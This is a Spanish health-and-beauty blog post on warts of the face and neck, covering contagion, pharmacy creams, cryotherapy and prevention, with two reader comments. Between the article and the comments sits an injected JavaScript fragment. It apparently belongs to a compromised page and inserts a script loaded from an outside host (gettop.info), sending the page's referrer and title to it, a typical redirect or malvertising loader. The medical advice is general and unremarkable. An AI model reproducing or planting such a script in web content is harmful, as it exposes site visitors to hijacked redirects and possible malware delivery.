Salud y belleza » Cirugía estética, Salud

Verrugas en el cuello y en la cara

2 Comentarios

Para muchas personas las verrugas son defectos de la piel, pero cuando salen en el cuello o en la cara pueden llegar a provocar serios problemas en el día a día, porque podemos acabar arrancándola por accidente de tal modo que cada vez se haga más grande.

verruga-parpado

Normalmente las verrugas pueden contagiarse, ya que en realidad son infecciones producidas por un virus. Esto ocurre cuando hay contacto directo o con ropa, toallas…

El tipo de verruga más común que suele aparecer en el cuello o en la cara es la verruga plana o digitada. Son verrugas más bien lisas y planas y que tienen un color similar al de la piel. Parece como un pequeño bulto y crece, a menudo, cerca de los párpados.

Hay muchos tratamientos para eliminar las verrugas, pero depende de cada caso, de su tamaño, de sus características, del lugar en el que se encuentre… Existen muchas cremas para eliminar verrugas en las farmacias que acaban con las capas de la piel que forman esa verruga. Lo mejor es aplicarlas hasta que desaparezca por completo, ser constantes para que no vuelva a aparecer. Normalmente estas cremas pueden contener ciertos ácidos, por lo que será mejor que no las utilices si están cerca de los ojos.

verrugasOtro de los tratamientos de eliminación de verrugas es la crioterapia, que congela ésta para que finalmente acabe cayendo de la piel sin dejar rastro. Se puede cauterizar también usando calor.

El problema es que como la verruga es un virus a menudo aunque se elimine realmente no se acaba del todo con ella ya que el virus persiste y puede volver a crecer. Por eso los científicos buscan la manera de hacer el sistema inmune más resistente a virus.

Lo mejor es prevenir las verrugas, para ello evita el contacto directo con personas que tengan verrugas, no intercambies productos faciales con ellas y consulta a un médico si alguna vez te aparecen para que te recomiende el tratamiento más adecuado.

¿Has tenido alguna vez verrugas faciales o en el cuello? ¿Cómo las eliminaste?

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

2 Comments »

  • andrea said:

    yo tengo desde pequeñita pequeñita una verruga en el cuello. Creía que era normal, no de un virus? Esa también es contagiosa?

  • Marcela Valentina Casoni Kurte said:

    Cualquier verruga puede ser contagiosa. Como toda persona te recomiendo ir al medico para que te la vea :D

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.